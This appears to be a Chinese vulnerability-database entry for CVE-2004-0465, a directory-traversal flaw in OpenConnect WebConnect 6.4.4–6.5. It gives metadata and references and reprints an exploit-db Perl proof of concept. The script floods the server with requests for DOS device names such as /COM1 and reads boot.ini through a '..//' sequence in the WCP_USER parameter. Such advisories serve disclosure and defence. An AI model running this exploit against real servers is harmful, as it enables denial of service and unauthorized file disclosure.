OpenConnect WebConnect多个远程漏洞

OpenConnect WebConnect多个远程漏洞

漏洞ID 1108484 漏洞类型 路径遍历
发布时间 2005-02-24 更新时间 2005-10-20
图片[1]-OpenConnect WebConnect多个远程漏洞-安全小百科CVE编号 CVE-2004-0465
图片[2]-OpenConnect WebConnect多个远程漏洞-安全小百科CNNVD-ID CNNVD-200412-1020
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/838
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-1020
|漏洞详情
WebConnect6.5和6.4.4以及可能早期版本的jretest.html存在目录遍历漏洞。远程攻击者借助WCP_USER参数中的”..//”序列读取具有任意INI格式的文件密钥。
|漏洞EXP
#WebConnect version 6.4.4 - 6.5 Proof of Concept
#Coded bY ++Karak0rsan++
#[email protected]
#Usage:perl webconnect.pl [target] [port] (Default port: 2080)
#Greetz:hurby,phalaposher,r3d_b4r0n,L4M3R,zeronc,Atak,sloan,emre,
#fox and all my friends
#Konak Anatolian High School - Prep/C Class
#Sen kendini biliyosun,attigin kaziklari unutmuycam artýk okulda
#yuzume de bakamiyosun.Masum suratina,gozlerine ALDANMISIM!
#Herseyi sen baslattin sen bitirdin unutma;SENIN BENI BITIRDIGIN
#YERDE SENDE BENIM ICIN BITERSIN!!!

$host=$ARGV[0];
$port=$ARGV[1];

if(!$ARGV[1]){
print "WebConnect 6.4.4 - 6.5 Proof of Conceptn";
print "Coded by ++Karak0rsan++n";
print "Usage:perl $0 [target] [port]n";
}


use IO::Socket;
$socket = new IO::Socket::INET( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM, );
close($socket);
if($socket){
print "[+]Attacking...!n";
print "[+]Allah Allah edalariyla saldiriyoz cunku biz muslumaniz:)n";
}

use IO::Socket;
for($i= 0; $i < 30; $i++)
{
$socket1 = new IO::Socket::INET( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM, ) or die "Didnt Connect,Enter target address!n";
print $socket1 "GET /COM1 HTTP/1.0rn";
print $socket1 "GET /COM2 HTTP/1.0rn";
print $socket1 "GET /COM1.jsp HTTP/1.0rn";
print $socket1 "GET /COM1.html HTTP/1.0rn";
print $socket1 "GET /COM1.smurf HTTP/1.0rn";
close($socket1);
}
$socket2 = new IO::Socket::INET( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM, );
print $socket2 "GET 
/jretest.html?lang=&parms=default&WCP_USER=..//..//..//..//..//boot.ini&action= 
HTTP/1.0rn";
close($socket2);
print "Attack finished ;)n";
exit();

# milw0rm.com [2005-02-24]
|参考资料

来源:US-CERTVulnerabilityNote:VU#JSHA-69HVPK
名称:http://www.kb.cert.org/vuls/id/JSHA-69HVPK
链接:http://www.kb.cert.org/vuls/id/JSHA-69HVPK
来源:US-CERTVulnerabilityNote:VU#628411
名称:VU#628411
链接:http://www.kb.cert.org/vuls/id/628411
来源:XF
名称:webconnect-wcpuser-directory-traversal(19394)
链接:http://xforce.iss.net/xforce/xfdb/19394
来源:www.cirt.dk
链接:http://www.cirt.dk/advisories/cirt-29-advisory.pdf
来源:SECUNIA
名称:14006
链接:http://secunia.com/advisories/14006/
来源:BUGTRAQ
名称:20050220TheWebConnect6.4.4and6.5containsseveralvulnerabilities
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110910838600145&w;=2

相关推荐: CGI Script Center Auction Weaver Username / Bidfile目录遍历漏洞

CGI Script Center Auction Weaver Username / Bidfile目录遍历漏洞 漏洞ID 1206117 漏洞类型 访问验证错误 发布时间 2000-12-19 更新时间 2005-05-02 CVE编号 CVE-2000-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享